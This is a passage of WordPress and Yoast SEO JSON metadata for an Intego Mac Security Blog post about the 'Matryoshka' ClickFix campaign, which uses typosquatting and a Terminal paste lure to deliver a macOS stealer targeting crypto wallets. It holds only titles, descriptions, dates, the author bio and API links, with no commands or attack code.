Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\" \/>\n<meta property=\"og:site_name\" content=\"The Mac Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-12T10:22:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-03T12:56:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\" \/>\n\t<meta property=\"og:image:width\" content=\"473\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Frederic Blaison\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\",\"name\":\"Intego\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"width\":875,\"height\":875,\"caption\":\"Intego\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"name\":\"The Mac Security Blog\",\"description\":\"Keep Macs safe from the dangers of the Internet\",\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"width\":473,\"height\":512,\"caption\":\"Example of a ClickFix-style lure that instructs users to copy a Terminal command from a download page.\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\",\"name\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\"},\"datePublished\":\"2026-02-12T10:22:54+00:00\",\"dateModified\":\"2026-03-03T12:56:11+00:00\",\"description\":\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \\u201cClickFix\\u201d social engineering campaign targeting macOS users. 
Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.intego.com\/mac-security-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer\"}]},{\"@type\":\"Article\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\"},\"author\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2\"},\"headline\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS 
Stealer\",\"datePublished\":\"2026-02-12T10:22:54+00:00\",\"dateModified\":\"2026-03-03T12:56:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\"},\"wordCount\":1193,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"keywords\":[\"ClickFix macOS malware AppleScript stealer typosquatting\",\"crypto wallet\"],\"articleSection\":[\"Malware\",\"Security &amp; Privacy\",\"Security News\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#respond\"]}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2\",\"name\":\"Frederic Blaison\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g\",\"caption\":\"Frederic Blaison\"},\"description\":\"Frederic is Intego\\u2019s Antivirus Labs Tech Lead, overseeing research into macOS malware and persistent threats. 
With over 30 years of expertise in Apple technologies, Fred\\u2019s background spans system administration, QA, and hands-on malware analysis, bringing deep technical insight to the front lines of macOS security.\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/author\/frederic-blaison\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","og_locale":"en_US","og_type":"article","og_title":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting","og_description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. 
Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","og_url":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","og_site_name":"The Mac Security Blog","article_published_time":"2026-02-12T10:22:54+00:00","article_modified_time":"2026-03-03T12:56:11+00:00","og_image":[{"width":473,"height":512,"url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Written by":"Frederic Blaison","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Organization","@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization","name":"Intego","url":"https:\/\/www.intego.com\/mac-security-blog\/","sameAs":[],"logo":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","width":875,"height":875,"caption":"Intego"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo"}},{"@type":"WebSite","@id":"https:\/\/www.intego.com\/mac-security-blog\/#website","url":"https:\/\/www.intego.com\/mac-security-blog\/","name":"The Mac Security Blog","description":"Keep Macs safe from the dangers of the Internet","publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","width":473,"height":512,"caption":"Example of a ClickFix-style lure that instructs users to copy a Terminal command from a download page."},{"@type":"WebPage","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage","url":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","name":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage"},"datePublished":"2026-02-12T10:22:54+00:00","dateModified":"2026-03-03T12:56:11+00:00","description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. 
Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","breadcrumb":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.intego.com\/mac-security-blog\/"},{"@type":"ListItem","position":2,"name":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer"}]},{"@type":"Article","@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#article","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage"},"author":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2"},"headline":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer","datePublished":"2026-02-12T10:22:54+00:00","dateModified":"2026-03-03T12:56:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage"},"wordCount":1193,"commentCount":0,"publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","keywords":["ClickFix macOS malware AppleScript stealer typosquatting","crypto 
wallet"],"articleSection":["Malware","Security &amp; Privacy","Security News"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#respond"]}]},{"@type":"Person","@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2","name":"Frederic Blaison","image":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#personlogo","inLanguage":"en-US","url":"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g","caption":"Frederic Blaison"},"description":"Frederic is Intego\u2019s Antivirus Labs Tech Lead, overseeing research into macOS malware and persistent threats. With over 30 years of expertise in Apple technologies, Fred\u2019s background spans system administration, QA, and hands-on malware analysis, bringing deep technical insight to the front lines of macOS 
security.","url":"https:\/\/www.intego.com\/mac-security-blog\/author\/frederic-blaison\/"}]}},"jetpack_featured_media_url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4VAYd-r54","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102"}],"collection":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/users\/115"}],"replies":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/comments?post=104102"}],"version-history":[{"count":68,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102\/revisions"}],"predecessor-version":[{"id":104176,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/posts\/104102\/revisions\/104176"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media\/104101"}],"wp:attachment":[{"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/media?parent=104102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/categories?post=104102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin.intego.com\/mac-security-blog\/wp-json\/wp\/v2\/tags?post=104102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}